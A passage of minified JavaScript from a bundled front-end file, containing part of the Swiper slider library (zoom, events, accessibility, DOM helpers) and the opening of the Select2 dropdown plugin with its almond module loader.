u=i.image.width*i.scale,d=i.image.height*i.scale;i.image.minX=Math.min(i.gesture.slideWidth/2-u/2,0),i.image.maxX=-i.image.minX,i.image.minY=Math.min(i.gesture.slideHeight/2-d/2,0),i.image.maxY=-i.image.minY,i.image.currentX=Math.max(Math.min(i.image.currentX,i.image.maxX),i.image.minX),i.image.currentY=Math.max(Math.min(i.image.currentY,i.image.maxY),i.image.minY),i.gesture.imageWrap.transition(c).transform("translate3d("+i.image.currentX+"px, "+i.image.currentY+"px,0)")}},onTransitionEnd:function(e){var t=e.zoom;t.gesture.slide&&e.previousIndex!==e.activeIndex&&(t.gesture.image.transform("translate3d(0,0,0) scale(1)"),t.gesture.imageWrap.transform("translate3d(0,0,0)"),t.gesture.slide=t.gesture.image=t.gesture.imageWrap=void 0,t.scale=t.currentScale=1)},toggleZoom:function(e,t){var i,n,o,s,a,r,l,c,u,d,h,p,f,m,g,v,y=e.zoom;(y.gesture.slide||(y.gesture.slide=e.clickedSlide?D(e.clickedSlide):e.slides.eq(e.activeIndex),y.gesture.image=y.gesture.slide.find("img, svg, canvas"),y.gesture.imageWrap=y.gesture.image.parent("."+e.params.zoomContainerClass)),y.gesture.image&&0!==y.gesture.image.length)&&(void 0===y.image.touchesStart.x&&t?(i="touchend"===t.type?t.changedTouches[0].pageX:t.pageX,n="touchend"===t.type?t.changedTouches[0].pageY:t.pageY):(i=y.image.touchesStart.x,n=y.image.touchesStart.y),y.scale&&1!==y.scale?(y.scale=y.currentScale=1,y.gesture.imageWrap.transition(300).transform("translate3d(0,0,0)"),y.gesture.image.transition(300).transform("translate3d(0,0,0) scale(1)"),y.gesture.slide=void 0):(y.scale=y.currentScale=y.gesture.imageWrap.attr("data-swiper-zoom")||e.params.zoomMax,t?(g=y.gesture.slide[0].offsetWidth,v=y.gesture.slide[0].offsetHeight,o=y.gesture.slide.offset().left+g/2-i,s=y.gesture.slide.offset().top+v/2-n,l=y.gesture.image[0].offsetWidth,c=y.gesture.image[0].offsetHeight,u=l*y.scale,d=c*y.scale,f=-(h=Math.min(g/2-u/2,0)),m=-(p=Math.min(v/2-d/2,0)),(a=o*y.scale)<h&&(a=h),f<a&&(a=f),(r=s*y.scale)<p&&(r=p),m<r&&(r=m)):r=a=0,y.gesture.imageWrap.transition(300).transform("translate3d("+a+"px, "+r+"px,0)"),y.gesture.image.transition(300).transform("translate3d(0,0,0) scale("+y.scale+")")))},attachEvents:function(e){var i=e?"off":"on";if(b.params.zoom){b.slides;var t=!("touchstart"!==b.touchEvents.start||!b.support.passiveListener||!b.params.passiveListeners)&&{passive:!0,capture:!1};b.support.gestures?(b.slides[i]("gesturestart",b.zoom.onGestureStart,t),b.slides[i]("gesturechange",b.zoom.onGestureChange,t),b.slides[i]("gestureend",b.zoom.onGestureEnd,t)):"touchstart"===b.touchEvents.start&&(b.slides[i](b.touchEvents.start,b.zoom.onGestureStart,t),b.slides[i](b.touchEvents.move,b.zoom.onGestureChange,t),b.slides[i](b.touchEvents.end,b.zoom.onGestureEnd,t)),b[i]("touchStart",b.zoom.onTouchStart),b.slides.each(function(e,t){0<D(t).find("."+b.params.zoomContainerClass).length&&D(t)[i](b.touchEvents.move,b.zoom.onTouchMove)}),b[i]("touchEnd",b.zoom.onTouchEnd),b[i]("transitionEnd",b.zoom.onTransitionEnd),b.params.zoomToggle&&b.on("doubleTap",b.zoom.toggleZoom)}},init:function(){b.zoom.attachEvents()},destroy:function(){b.zoom.attachEvents(!0)}},b._plugins=[],b.plugins){var L=b.plugins[A](b,b.params[A]);L&&b._plugins.push(L)}return b.callPlugins=function(e){for(var t=0;t<b._plugins.length;t++)e in b._plugins[t]&&b._plugins[t][e](arguments[1],arguments[2],arguments[3],arguments[4],arguments[5])},b.emitterEventListeners={},b.emit=function(e){var t;if(b.params[e]&&b.params[e](arguments[1],arguments[2],arguments[3],arguments[4],arguments[5]),b.emitterEventListeners[e])for(t=0;t<b.emitterEventListeners[e].length;t++)b.emitterEventListeners[e][t](arguments[1],arguments[2],arguments[3],arguments[4],arguments[5]);b.callPlugins&&b.callPlugins(e,arguments[1],arguments[2],arguments[3],arguments[4],arguments[5])},b.on=function(e,t){return e=r(e),b.emitterEventListeners[e]||(b.emitterEventListeners[e]=[]),b.emitterEventListeners[e].push(t),b},b.off=function(e,t){var i;if(e=r(e),void 0===t)return b.emitterEventListeners[e]=[],b;if(b.emitterEventListeners[e]&&0!==b.emitterEventListeners[e].length){for(i=0;i<b.emitterEventListeners[e].length;i++)b.emitterEventListeners[e][i]===t&&b.emitterEventListeners[e].splice(i,1);return b}},b.once=function(e,t){e=r(e);var i=function(){t(arguments[0],arguments[1],arguments[2],arguments[3],arguments[4]),b.off(e,i)};return b.on(e,i),b},b.a11y={makeFocusable:function(e){return e.attr("tabIndex","0"),e},addRole:function(e,t){return e.attr("role",t),e},addLabel:function(e,t){return e.attr("aria-label",t),e},disable:function(e){return e.attr("aria-disabled",!0),e},enable:function(e){return e.attr("aria-disabled",!1),e},onEnterKey:function(e){13===e.keyCode&&(D(e.target).is(b.params.nextButton)?(b.onClickNext(e),b.isEnd?b.a11y.notify(b.params.lastSlideMessage):b.a11y.notify(b.params.nextSlideMessage)):D(e.target).is(b.params.prevButton)&&(b.onClickPrev(e),b.isBeginning?b.a11y.notify(b.params.firstSlideMessage):b.a11y.notify(b.params.prevSlideMessage)),D(e.target).is("."+b.params.bulletClass)&&D(e.target)[0].click())},liveRegion:D('<span class="'+b.params.notificationClass+'" aria-live="assertive" aria-atomic="true"></span>'),notify:function(e){var t=b.a11y.liveRegion;0!==t.length&&(t.html(""),t.html(e))},init:function(){b.params.nextButton&&b.nextButton&&0<b.nextButton.length&&(b.a11y.makeFocusable(b.nextButton),b.a11y.addRole(b.nextButton,"button"),b.a11y.addLabel(b.nextButton,b.params.nextSlideMessage)),b.params.prevButton&&b.prevButton&&0<b.prevButton.length&&(b.a11y.makeFocusable(b.prevButton),b.a11y.addRole(b.prevButton,"button"),b.a11y.addLabel(b.prevButton,b.params.prevSlideMessage)),D(b.container).append(b.a11y.liveRegion)},initPagination:function(){b.params.pagination&&b.params.paginationClickable&&b.bullets&&b.bullets.length&&b.bullets.each(function(){var e=D(this);b.a11y.makeFocusable(e),b.a11y.addRole(e,"button"),b.a11y.addLabel(e,b.params.paginationBulletMessage.replace(/{{index}}/,e.index()+1))})},destroy:function(){b.a11y.liveRegion&&0<b.a11y.liveRegion.length&&b.a11y.liveRegion.remove()}},b.init=function(){b.params.loop&&b.createLoop(),b.updateContainerSize(),b.updateSlidesSize(),b.updatePagination(),b.params.scrollbar&&b.scrollbar&&(b.scrollbar.set(),b.params.scrollbarDraggable&&b.scrollbar.enableDraggable()),"slide"!==b.params.effect&&b.effects[b.params.effect]&&(b.params.loop||b.updateProgress(),b.effects[b.params.effect].setTranslate()),b.params.loop?b.slideTo(b.params.initialSlide+b.loopedSlides,0,b.params.runCallbacksOnInit):(b.slideTo(b.params.initialSlide,0,b.params.runCallbacksOnInit),0===b.params.initialSlide&&(b.parallax&&b.params.parallax&&b.parallax.setTranslate(),b.lazy&&b.params.lazyLoading&&(b.lazy.load(),b.lazy.initialImageLoaded=!0))),b.attachEvents(),b.params.observer&&b.support.observer&&b.initObservers(),b.params.preloadImages&&!b.params.lazyLoading&&b.preloadImages(),b.params.zoom&&b.zoom&&b.zoom.init(),b.params.autoplay&&b.startAutoplay(),b.params.keyboardControl&&b.enableKeyboardControl&&b.enableKeyboardControl(),b.params.mousewheelControl&&b.enableMousewheelControl&&b.enableMousewheelControl(),b.params.hashnavReplaceState&&(b.params.replaceState=b.params.hashnavReplaceState),b.params.history&&b.history&&b.history.init(),b.params.hashnav&&b.hashnav&&b.hashnav.init(),b.params.a11y&&b.a11y&&b.a11y.init(),b.emit("onInit",b)},b.cleanupStyles=function(){b.container.removeClass(b.classNames.join(" ")).removeAttr("style"),b.wrapper.removeAttr("style"),b.slides&&b.slides.length&&b.slides.removeClass([b.params.slideVisibleClass,b.params.slideActiveClass,b.params.slideNextClass,b.params.slidePrevClass].join(" ")).removeAttr("style").removeAttr("data-swiper-column").removeAttr("data-swiper-row"),b.paginationContainer&&b.paginationContainer.length&&b.paginationContainer.removeClass(b.params.paginationHiddenClass),b.bullets&&b.bullets.length&&b.bullets.removeClass(b.params.bulletActiveClass),b.params.prevButton&&D(b.params.prevButton).removeClass(b.params.buttonDisabledClass),b.params.nextButton&&D(b.params.nextButton).removeClass(b.params.buttonDisabledClass),b.params.scrollbar&&b.scrollbar&&(b.scrollbar.track&&b.scrollbar.track.length&&b.scrollbar.track.removeAttr("style"),b.scrollbar.drag&&b.scrollbar.drag.length&&b.scrollbar.drag.removeAttr("style"))},b.destroy=function(e,t){b.detachEvents(),b.stopAutoplay(),b.params.scrollbar&&b.scrollbar&&b.params.scrollbarDraggable&&b.scrollbar.disableDraggable(),b.params.loop&&b.destroyLoop(),t&&b.cleanupStyles(),b.disconnectObservers(),b.params.zoom&&b.zoom&&b.zoom.destroy(),b.params.keyboardControl&&b.disableKeyboardControl&&b.disableKeyboardControl(),b.params.mousewheelControl&&b.disableMousewheelControl&&b.disableMousewheelControl(),b.params.a11y&&b.a11y&&b.a11y.destroy(),b.params.history&&!b.params.replaceState&&window.removeEventListener("popstate",b.history.setHistoryPopState),b.params.hashnav&&b.hashnav&&b.hashnav.destroy(),b.emit("onDestroy"),!1!==e&&(b=null)},b.init(),b}};H.prototype={isSafari:(l=navigator.userAgent.toLowerCase(),0<=l.indexOf("safari")&&l.indexOf("chrome")<0&&l.indexOf("android")<0),isUiWebView:/(iPhone|iPod|iPad).*AppleWebKit(?!.*Safari)/i.test(navigator.userAgent),isArray:function(e){return"[object Array]"===Object.prototype.toString.apply(e)},browser:{ie:window.navigator.pointerEnabled||window.navigator.msPointerEnabled,ieTouch:window.navigator.msPointerEnabled&&1<window.navigator.msMaxTouchPoints||window.navigator.pointerEnabled&&1<window.navigator.maxTouchPoints,lteIE9:(r=document.createElement("div"),r.innerHTML="<!--[if lte IE 9]><i></i><![endif]-->",1===r.getElementsByTagName("i").length)},device:(i=navigator.userAgent,n=i.match(/(Android);?[\s\/]+([\d.]+)?/),o=i.match(/(iPad).*OS\s([\d_]+)/),s=i.match(/(iPod)(.*OS\s([\d_]+))?/),a=!o&&i.match(/(iPhone\sOS)\s([\d_]+)/),{ios:o||a||s,android:n}),support:{touch:window.Modernizr&&!0===Modernizr.touch||!!("ontouchstart"in window||window.DocumentTouch&&document instanceof DocumentTouch),transforms3d:window.Modernizr&&!0===Modernizr.csstransforms3d||(t=document.createElement("div").style,"webkitPerspective"in t||"MozPerspective"in t||"OPerspective"in t||"MsPerspective"in t||"perspective"in t),flexbox:function(){for(var e=document.createElement("div").style,t="alignItems webkitAlignItems webkitBoxAlign msFlexAlign mozBoxAlign webkitFlexDirection msFlexDirection mozBoxDirection mozBoxOrient webkitBoxDirection webkitBoxOrient".split(" "),i=0;i<t.length;i++)if(t[i]in e)return!0}(),observer:"MutationObserver"in window||"WebkitMutationObserver"in window,passiveListener:function(){var e=!1;try{var t=Object.defineProperty({},"passive",{get:function(){e=!0}});window.addEventListener("testPassiveListener",null,t)}catch(e){}return e}(),gestures:"ongesturestart"in window},plugins:{}};for(var c,u,d,j=(u=function(e,t){var i=[],n=0;if(e&&!t&&e instanceof c)return e;if(e)if("string"==typeof e){var o,s,a=e.trim();if(0<=a.indexOf("<")&&0<=a.indexOf(">")){var r="div";for(0===a.indexOf("<li")&&(r="ul"),0===a.indexOf("<tr")&&(r="tbody"),0!==a.indexOf("<td")&&0!==a.indexOf("<th")||(r="tr"),0===a.indexOf("<tbody")&&(r="table"),0===a.indexOf("<option")&&(r="select"),(s=document.createElement(r)).innerHTML=e,n=0;n<s.childNodes.length;n++)i.push(s.childNodes[n])}else for(o=t||"#"!==e[0]||e.match(/[ .<>:~]/)?(t||document).querySelectorAll(e):[document.getElementById(e.split("#")[1])],n=0;n<o.length;n++)o[n]&&i.push(o[n])}else if(e.nodeType||e===window||e===document)i.push(e);else if(0<e.length&&e[0].nodeType)for(n=0;n<e.length;n++)i.push(e[n]);return new c(i)},(c=function(e){var t=0;for(t=0;t<e.length;t++)this[t]=e[t];return this.length=e.length,this}).prototype={addClass:function(e){if(void 0===e)return this;for(var t=e.split(" "),i=0;i<t.length;i++)for(var n=0;n<this.length;n++)this[n].classList.add(t[i]);return this},removeClass:function(e){for(var t=e.split(" "),i=0;i<t.length;i++)for(var n=0;n<this.length;n++)this[n].classList.remove(t[i]);return this},hasClass:function(e){return!!this[0]&&this[0].classList.contains(e)},toggleClass:function(e){for(var t=e.split(" "),i=0;i<t.length;i++)for(var n=0;n<this.length;n++)this[n].classList.toggle(t[i]);return this},attr:function(e,t){if(1===arguments.length&&"string"==typeof e)return this[0]?this[0].getAttribute(e):void 0;for(var i=0;i<this.length;i++)if(2===arguments.length)this[i].setAttribute(e,t);else for(var n in e)this[i][n]=e[n],this[i].setAttribute(n,e[n]);return this},removeAttr:function(e){for(var t=0;t<this.length;t++)this[t].removeAttribute(e);return this},data:function(e,t){if(void 0!==t){for(var i=0;i<this.length;i++){var n=this[i];n.dom7ElementDataStorage||(n.dom7ElementDataStorage={}),n.dom7ElementDataStorage[e]=t}return this}if(this[0]){var o=this[0].getAttribute("data-"+e);return o||(this[0].dom7ElementDataStorage&&e in this[0].dom7ElementDataStorage?this[0].dom7ElementDataStorage[e]:void 0)}},transform:function(e){for(var t=0;t<this.length;t++){var i=this[t].style;i.webkitTransform=i.MsTransform=i.msTransform=i.MozTransform=i.OTransform=i.transform=e}return this},transition:function(e){"string"!=typeof e&&(e+="ms");for(var t=0;t<this.length;t++){var i=this[t].style;i.webkitTransitionDuration=i.MsTransitionDuration=i.msTransitionDuration=i.MozTransitionDuration=i.OTransitionDuration=i.transitionDuration=e}return this},on:function(e,o,s,t){function i(e){var t=e.target;if(u(t).is(o))s.call(t,e);else for(var i=u(t).parents(),n=0;n<i.length;n++)u(i[n]).is(o)&&s.call(i[n],e)}var n,a,r=e.split(" ");for(n=0;n<this.length;n++)if("function"==typeof o||!1===o)for("function"==typeof o&&(t=(s=o)||!1),a=0;a<r.length;a++)this[n].addEventListener(r[a],s,t);else for(a=0;a<r.length;a++)this[n].dom7LiveListeners||(this[n].dom7LiveListeners=[]),this[n].dom7LiveListeners.push({listener:s,liveListener:i}),this[n].addEventListener(r[a],i,t);return this},off:function(e,t,i,n){for(var o=e.split(" "),s=0;s<o.length;s++)for(var a=0;a<this.length;a++)if("function"==typeof t||!1===t)"function"==typeof t&&(n=(i=t)||!1),this[a].removeEventListener(o[s],i,n);else if(this[a].dom7LiveListeners)for(var r=0;r<this[a].dom7LiveListeners.length;r++)this[a].dom7LiveListeners[r].listener===i&&this[a].removeEventListener(o[s],this[a].dom7LiveListeners[r].liveListener,n);return this},once:function(i,n,o,s){var a=this;"function"==typeof n&&(s=o=n=!1),a.on(i,n,function e(t){o(t),a.off(i,n,e,s)},s)},trigger:function(t,i){for(var e=0;e<this.length;e++){var n;try{n=new window.CustomEvent(t,{detail:i,bubbles:!0,cancelable:!0})}catch(e){(n=document.createEvent("Event")).initEvent(t,!0,!0),n.detail=i}this[e].dispatchEvent(n)}return this},transitionEnd:function(t){function i(e){if(e.target===this)for(t.call(this,e),n=0;n<o.length;n++)s.off(o[n],i)}var n,o=["webkitTransitionEnd","transitionend","oTransitionEnd","MSTransitionEnd","msTransitionEnd"],s=this;if(t)for(n=0;n<o.length;n++)s.on(o[n],i);return this},width:function(){return this[0]===window?window.innerWidth:0<this.length?parseFloat(this.css("width")):null},outerWidth:function(e){return 0<this.length?e?this[0].offsetWidth+parseFloat(this.css("margin-right"))+parseFloat(this.css("margin-left")):this[0].offsetWidth:null},height:function(){return this[0]===window?window.innerHeight:0<this.length?parseFloat(this.css("height")):null},outerHeight:function(e){return 0<this.length?e?this[0].offsetHeight+parseFloat(this.css("margin-top"))+parseFloat(this.css("margin-bottom")):this[0].offsetHeight:null},offset:function(){if(0<this.length){var e=this[0],t=e.getBoundingClientRect(),i=document.body,n=e.clientTop||i.clientTop||0,o=e.clientLeft||i.clientLeft||0,s=window.pageYOffset||e.scrollTop,a=window.pageXOffset||e.scrollLeft;return{top:t.top+s-n,left:t.left+a-o}}return null},css:function(e,t){var i;if(1===arguments.length){if("string"!=typeof e){for(i=0;i<this.length;i++)for(var n in e)this[i].style[n]=e[n];return this}if(this[0])return window.getComputedStyle(this[0],null).getPropertyValue(e)}if(2===arguments.length&&"string"==typeof e){for(i=0;i<this.length;i++)this[i].style[e]=t;return this}return this},each:function(e){for(var t=0;t<this.length;t++)e.call(this[t],t,this[t]);return this},html:function(e){if(void 0===e)return this[0]?this[0].innerHTML:void 0;for(var t=0;t<this.length;t++)this[t].innerHTML=e;return this},text:function(e){if(void 0===e)return this[0]?this[0].textContent.trim():null;for(var t=0;t<this.length;t++)this[t].textContent=e;return this},is:function(e){if(!this[0])return!1;var t,i;if("string"==typeof e){var n=this[0];if(n===document)return e===document;if(n===window)return e===window;if(n.matches)return n.matches(e);if(n.webkitMatchesSelector)return n.webkitMatchesSelector(e);if(n.mozMatchesSelector)return n.mozMatchesSelector(e);if(n.msMatchesSelector)return n.msMatchesSelector(e);for(t=u(e),i=0;i<t.length;i++)if(t[i]===this[0])return!0;return!1}if(e===document)return this[0]===document;if(e===window)return this[0]===window;if(e.nodeType||e instanceof c){for(t=e.nodeType?[e]:e,i=0;i<t.length;i++)if(t[i]===this[0])return!0;return!1}return!1},index:function(){if(this[0]){for(var e=this[0],t=0;null!==(e=e.previousSibling);)1===e.nodeType&&t++;return t}},eq:function(e){if(void 0===e)return this;var t,i=this.length;return new c(i-1<e?[]:e<0?(t=i+e)<0?[]:[this[t]]:[this[e]])},append:function(e){var t,i;for(t=0;t<this.length;t++)if("string"==typeof e){var n=document.createElement("div");for(n.innerHTML=e;n.firstChild;)this[t].appendChild(n.firstChild)}else if(e instanceof c)for(i=0;i<e.length;i++)this[t].appendChild(e[i]);else this[t].appendChild(e);return this},prepend:function(e){var t,i;for(t=0;t<this.length;t++)if("string"==typeof e){var n=document.createElement("div");for(n.innerHTML=e,i=n.childNodes.length-1;0<=i;i--)this[t].insertBefore(n.childNodes[i],this[t].childNodes[0])}else if(e instanceof c)for(i=0;i<e.length;i++)this[t].insertBefore(e[i],this[t].childNodes[0]);else this[t].insertBefore(e,this[t].childNodes[0]);return this},insertBefore:function(e){for(var t=u(e),i=0;i<this.length;i++)if(1===t.length)t[0].parentNode.insertBefore(this[i],t[0]);else if(1<t.length)for(var n=0;n<t.length;n++)t[n].parentNode.insertBefore(this[i].cloneNode(!0),t[n])},insertAfter:function(e){for(var t=u(e),i=0;i<this.length;i++)if(1===t.length)t[0].parentNode.insertBefore(this[i],t[0].nextSibling);else if(1<t.length)for(var n=0;n<t.length;n++)t[n].parentNode.insertBefore(this[i].cloneNode(!0),t[n].nextSibling)},next:function(e){return 0<this.length?e?this[0].nextElementSibling&&u(this[0].nextElementSibling).is(e)?new c([this[0].nextElementSibling]):new c([]):this[0].nextElementSibling?new c([this[0].nextElementSibling]):new c([]):new c([])},nextAll:function(e){var t=[],i=this[0];if(!i)return new c([]);for(;i.nextElementSibling;){var n=i.nextElementSibling;e?u(n).is(e)&&t.push(n):t.push(n),i=n}return new c(t)},prev:function(e){return 0<this.length?e?this[0].previousElementSibling&&u(this[0].previousElementSibling).is(e)?new c([this[0].previousElementSibling]):new c([]):this[0].previousElementSibling?new c([this[0].previousElementSibling]):new c([]):new c([])},prevAll:function(e){var t=[],i=this[0];if(!i)return new c([]);for(;i.previousElementSibling;){var n=i.previousElementSibling;e?u(n).is(e)&&t.push(n):t.push(n),i=n}return new c(t)},parent:function(e){for(var t=[],i=0;i<this.length;i++)e?u(this[i].parentNode).is(e)&&t.push(this[i].parentNode):t.push(this[i].parentNode);return u(u.unique(t))},parents:function(e){for(var t=[],i=0;i<this.length;i++)for(var n=this[i].parentNode;n;)e?u(n).is(e)&&t.push(n):t.push(n),n=n.parentNode;return u(u.unique(t))},find:function(e){for(var t=[],i=0;i<this.length;i++)for(var n=this[i].querySelectorAll(e),o=0;o<n.length;o++)t.push(n[o]);return new c(t)},children:function(e){for(var t=[],i=0;i<this.length;i++)for(var n=this[i].childNodes,o=0;o<n.length;o++)e?1===n[o].nodeType&&u(n[o]).is(e)&&t.push(n[o]):1===n[o].nodeType&&t.push(n[o]);return new c(u.unique(t))},remove:function(){for(var e=0;e<this.length;e++)this[e].parentNode&&this[e].parentNode.removeChild(this[e]);return this},add:function(){var e,t;for(e=0;e<arguments.length;e++){var i=u(arguments[e]);for(t=0;t<i.length;t++)this[this.length]=i[t],this.length++}return this}},u.fn=c.prototype,u.unique=function(e){for(var t=[],i=0;i<e.length;i++)-1===t.indexOf(e[i])&&t.push(e[i]);return t},u),h=["jQuery","Zepto","Dom7"],R=0;R<h.length;R++)window[h[R]]&&e(window[h[R]]);(d=void 0===j?window.Dom7||window.Zepto||window.jQuery:j)&&("transitionEnd"in d.fn||(d.fn.transitionEnd=function(t){function i(e){if(e.target===this)for(t.call(this,e),n=0;n<o.length;n++)s.off(o[n],i)}var n,o=["webkitTransitionEnd","transitionend","oTransitionEnd","MSTransitionEnd","msTransitionEnd"],s=this;if(t)for(n=0;n<o.length;n++)s.on(o[n],i);return this}),"transform"in d.fn||(d.fn.transform=function(e){for(var t=0;t<this.length;t++){var i=this[t].style;i.webkitTransform=i.MsTransform=i.msTransform=i.MozTransform=i.OTransform=i.transform=e}return this}),"transition"in d.fn||(d.fn.transition=function(e){"string"!=typeof e&&(e+="ms");for(var t=0;t<this.length;t++){var i=this[t].style;i.webkitTransitionDuration=i.MsTransitionDuration=i.msTransitionDuration=i.MozTransitionDuration=i.OTransitionDuration=i.transitionDuration=e}return this}),"outerWidth"in d.fn||(d.fn.outerWidth=function(e){return 0<this.length?e?this[0].offsetWidth+parseFloat(this.css("margin-right"))+parseFloat(this.css("margin-left")):this[0].offsetWidth:null})),window.Swiper=H}(),"undefined"!=typeof module?module.exports=window.Swiper:"function"==typeof define&&define.amd&&define([],function(){"use strict";return window.Swiper}),function(i){"function"==typeof define&&define.amd?define(["jquery"],i):"object"==typeof module&&module.exports?module.exports=function(e,t){return void 0===t&&(t="undefined"!=typeof window?require("jquery"):require("jquery")(e)),i(t),t}:i(jQuery)}(function(i){var e=function(){if(i&&i.fn&&i.fn.select2&&i.fn.select2.amd)var e=i.fn.select2.amd;var t,o,c;return e&&e.requirejs||(e?o=e:e={},function(p){function f(e,t){return i.call(e,t)}function r(e,t){var i,n,o,s,a,r,l,c,u,d,h,p=t&&t.split("/"),f=C.map,m=f&&f["*"]||{};if(e){for(a=(e=e.split("/")).length-1,C.nodeIdCompat&&k.test(e[a])&&(e[a]=e[a].replace(k,"")),"."===e[0].charAt(0)&&p&&(e=p.slice(0,p.length-1).concat(e)),u=0;u<e.length;u++)if("."===(h=e[u]))e.splice(u,1),u-=1;else if(".."===h){if(0===u||1===u&&".."===e[2]||".."===e[u-1])continue;0<u&&(e.splice(u-1,2),u-=2)}e=e.join("/")}if((p||m)&&f){for(u=(i=e.split("/")).length;0<u;u-=1){if(n=i.slice(0,u).join("/"),p)for(d=p.length;0<d;d-=1)if((o=f[p.slice(0,d).join("/")])&&(o=o[n])){s=o,r=u;break}if(s)break;!l&&m&&m[n]&&(l=m[n],c=u)}!s&&l&&(s=l,r=c),s&&(i.splice(0,r,s),e=i.join("/"))}return e}function m(t,i){return function(){var e=n.call(arguments,0);return"string"!=typeof e[0]&&1===e.length&&e.push(null),a.apply(p,e.concat([t,i]))}}function g(t){return function(e){_[t]=e}}function v(e){if(f(x,e)){var t=x[e];delete x[e],$[e]=!0,s.apply(p,t)}if(!f(_,e)&&!f($,e))throw new Error("No "+e);return _[e]}function l(e){var t,i=e?e.indexOf("!"):-1;return-1<i&&(t=e.substring(0,i),e=e.substring(i+1,e.length)),[t,e]}function y(e){return e?l(e):[]}var s,a,w,b,_={},x={},C={},$={},i=Object.prototype.hasOwnProperty,n=[].slice,k=/\.js$/;w=function(e,t){var i,n,o=l(e),s=o[0],a=t[1];return e=o[1],s&&(i=v(s=r(s,a))),s?e=i&&i.normalize?i.normalize(e,(n=a,function(e){return r(e,n)})):r(e,a):(s=(o=l(e=r(e,a)))[0],e=o[1],s&&(i=v(s))),{f:s?s+"!"+e:e,n:e,pr:s,p:i}},b={require:function(e){return m(e)},exports:function(e){var t=_[e];return void 0!==t?t:_[e]={}},module:function(e){return{id:e,uri:"",exports:_[e],config:(t=e,function(){return C&&C.config&&C.config[t]||{}})};var t}},s=function(e,t,i,n){var o,s,a,r,l,c,u,d=[],h=typeof i;if(c=y(n=n||e),"undefined"===h||"function"===h){for(t=!t.length&&i.length?["require","exports","module"]:t,l=0;l<t.length;l+=1)if("require"===(s=(r=w(t[l],c)).f))d[l]=b.require(e);else if("exports"===s)d[l]=b.exports(e),u=!0;else if("module"===s)o=d[l]=b.module(e);else if(f(_,s)||f(x,s)||f($,s))d[l]=v(s);else{if(!r.p)throw new Error(e+" missing "+s);r.p.load(r.n,m(n,!0),g(s),{}),d[l]=_[s]}a=i?i.apply(_[e],d):void 0,e&&(o&&o.exports!==p&&o.exports!==_[e]?_[e]=o.exports:a===p&&u||(_[e]=a))}else e&&(_[e]=i)},t=o=a=function(e,t,i,n,o){if("string"==typeof e)return b[e]?b[e](t):v(w(e,y(t)).f);if(!e.splice){if((C=e).deps&&a(C.deps,C.callback),!t)return;t.splice?(e=t,t=i,i=null):e=p}return t=t||function(){},"function"==typeof i&&(i=n,n=o),n?s(p,e,t,i):setTimeout(function(){s(p,e,t,i)},4),a},a.config=function(e){return a(e)},t._defined=_,(c=function(e,t,i){if("string"!=typeof e)throw new Error("See almond README: incorrect module build, no module name");t.splice||(i=t,t=[]),f(_,e)||f(x,e)||(x[e]=[e,t,i])}).amd={jQuery:!0}}(),e.requirejs=t,e.require=o,e.define=c),e.define("almond",function(){}),e.define("jquery",[],function(){var e=i||$;return null==e&&console&&console.error&&console.error("Select2: An instance of jQuery or a jQuery-compatible library was not found. Make sure that you are including jQuery before Select2 on your web page."),e}),e.define("select2/utils",["jquery"],function(s){function u(e){var t=e.prototype,i=[];for(var n in t)"function"==typeof t[n]&&"constructor"!==n&&i.push(n);return i}var e={Extend:function(e,t){function i(){this.constructor=e}var n={}.hasOwnProperty;for(var o in t)n.call(t,o)&&(e[o]=t[o]);return i.prototype=t.prototype,e.prototype=new i,e.__super__=t.prototype,e},Decorate:function(n,o){function s(){var e=Array.prototype.unshift,t=o.prototype.constructor.length,i=n.prototype.constructor;0<t&&(e.call(arguments,n.prototype.constructor),i=o.prototype.constructor),i.apply(this,arguments)}var e=u(o),t=u(n);o.displayName=n.displayName,s.prototype=new function(){this.constructor=s};for(var i=0;i<t.length;i++){var a=t[i];s.prototype[a]=n.prototype[a]}for(var r=function(e){var t=function(){};e in s.prototype&&(t=s.prototype[e]);var i=o.prototype[e];return function(){return Array.prototype.unshift.call(arguments,t),i.apply(this,arguments)}},l=0;l<e.length;l++){var c=e[l];s.prototype[c]=r(c)}return s}},t=function(){this.listeners={}};return t.prototype.on=function(e,t){this.listeners=this.listeners||{},e in this.listeners?this.listeners[e].push(t):this.listeners[e]=[t]},t.prototype.trigger=function(e){var t=Array.prototype.slice,i=t.call(arguments,1);this.listeners=this.listeners||{},null==i&&(i=[]),0===i.length&&i.push({}),(i[0]._type=e)in this.listeners&&this.invoke(this.listeners[e],t.call(arguments,1)),"*"in this.listeners&&this.invoke(this.listeners["*"],arguments)},t.prototype.invoke=function(e,t){for(var i=0,n=e.length;i<n;i++)e[i].apply(this,t)},e.Observable=t,e.generateChars=function(e){for(var t="",i=0;i<e;i++)t+=Math.floor(36*Math.random()).toString(36);return t},e.bind=function(e,t){return function(){e.apply(t,arguments)}},e._convertData=function(e){for(var t in e){var i=t.split("-"),n=e;if(1!==i.length){for(var o=0;o<i.length;o++){var s=i[o];(s=s.substring(0,1).toLowerCase()+s.substring(1))in n||(n[s]={}),o==i.length-1&&(n[s]=e[t]),n=n[s]}delete e[t]}}return e},e.hasScroll=function(e,t){var i=s(t),n=t.style.overflowX,o=t.style.overflowY;return(n!==o||"hidden"!==o&&"visible"!==o)&&("scroll"===n||"scroll"===o||i.innerHeight()<t.scrollHeight||i.innerWidth()<t.scrollWidth)},e.escapeMarkup=function(e){var t={"\\":"&#92;","&":"&amp;","<":"&lt;",">":"&gt;",'"':"&quot;","'":"&#39;","/":"&#47;"};return"string"!=typeof e?e:String(e).replace(/[&<>"'\/\\]/g,function(e){return t[e]})},e.appendMany=function(e,t){if("1.7"===s.fn.jquery.substr(0,3)){var i=s();s.map(t,function(e){i=i.add(e)}),t=i}e.append(t)},e}),e.define("select2/results",["jquery","./utils"],function(h,e){function n(e,t,i){this.$element=e,this.data=i,this.options=t,n.__super__.constructor.call(this)}return e.Extend(n,e.Observable),n.prototype.render=function(){var e=h('<ul class="select2-results__options" role="tree"></ul>');return this.options.get("multiple")&&e.attr("aria-multiselectable","true"),this.$results=e},n.prototype.clear=function(){this.$results.empty()},n.prototype.displayMessage=function(e){var t=this.options.get("escapeMarkup");this.clear(),this.hideLoading();var i=h('<li role="treeitem" aria-live="assertive" class="select2-results__option"></li>'),n=this.options.get("translations").get(e.message);i.append(t(n(e.args))),i[0].className+=" select2-results__message",this.$results.append(i)},n.prototype.hideMessages=function(){this.$results.find(".select2-results__message").remove()},n.prototype.append=function(e){this.hideLoading();var t=[];if(null!=e.results&&0!==e.results.length){e.results=this.sort(e.results);for(var i=0;i<e.results.length;i++){var n=e.results[i],o=this.option(n);t.push(o)}this.$results.append(t)}else 